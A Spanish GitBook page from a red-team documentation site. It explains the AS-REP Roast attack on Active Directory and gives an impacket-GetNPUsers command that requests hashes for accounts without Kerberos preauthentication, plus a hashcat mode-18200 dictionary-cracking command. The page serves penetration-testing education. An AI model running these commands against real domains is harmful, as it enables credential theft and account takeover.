Iron Wolf Security Experts
InicioServicios de CiberseguridadDocumentación técnicaContacto
  • Documentación Técnica
  • Todo sobre un Red Team
    • Qué es un Red Team
    • Red Team VS Test de intrusión
    • Objetivos y Alcance
    • Desarrollo y organización
    • Escenarios y vectores de acceso
    • Equipos y comunicación interna
    • Ventajas y beneficios de un ejercicio de Red Team
  • Técnicas y Ataques
    • Ataques a Directorio Activo
      • Enumeración
        • Enumeración de usuarios Kerberos
      • Kerberos
        • Kerberoasting
        • Password Spraying kerberos
        • AS-REP Roast
        • Constrained delegation
      • Credenciales
        • Dumping Active Directory Hashes - NTDS.dit
  • Cheat Sheet
    • Túneles y conexiones reversas
      • Proxy Socks
      • Chisel
    • PowerShell
      • Encode & decode Base64
      • PortScan
    • Fuerza bruta & Cracking
  • web
    • GraphQL introspección
Powered by GitBook
On this page
  • Explotación
  • Crackear Hash con Hashcat
  1. Técnicas y Ataques
  2. Ataques a Directorio Activo
  3. Kerberos

AS-REP Roast

PreviousPassword Spraying kerberosNextConstrained delegation

Last updated 3 years ago

El ataque AS-REP Roast permite obtener los hashes de aquellos usuarios que tienen habilitada la opción Do not require Kerberos preuthentication en Active Directory.

  • Impacket-GetNPUsers (Linux)

  • Rubeus (Windows)

Explotación

impacket-GetNPUsers atlanta.corp/ -usersfile /home/iwolf/Desktop/users2.txt -dc-ip 10.0.0.128 -request

Crackear Hash con Hashcat

Por defecto el hash que se obtiene con impacket-GetNPUsers tiene el formato específico para crackearlo con la herramienta Hashcat. Por lo que para crackear los hash bastaría con indicar a Hashcat el tipo de hash que es Kerberos 5, etype 23, AS-REP y el tipo de fuerza bruta que se realizará.

Comando Hashcat AS-REPROAST
hashcat -m 18200 /home/iwolf/Desktop/hash_ASREPRoast.xtx -a 0 /home/iwolf/Desktop/passwords.txt

-m18200 --> formato del hash a crackear (Kerberos 5, etype 23, AS-REP). -a 0 --> tipo de fuerza bruta mediante diccionario.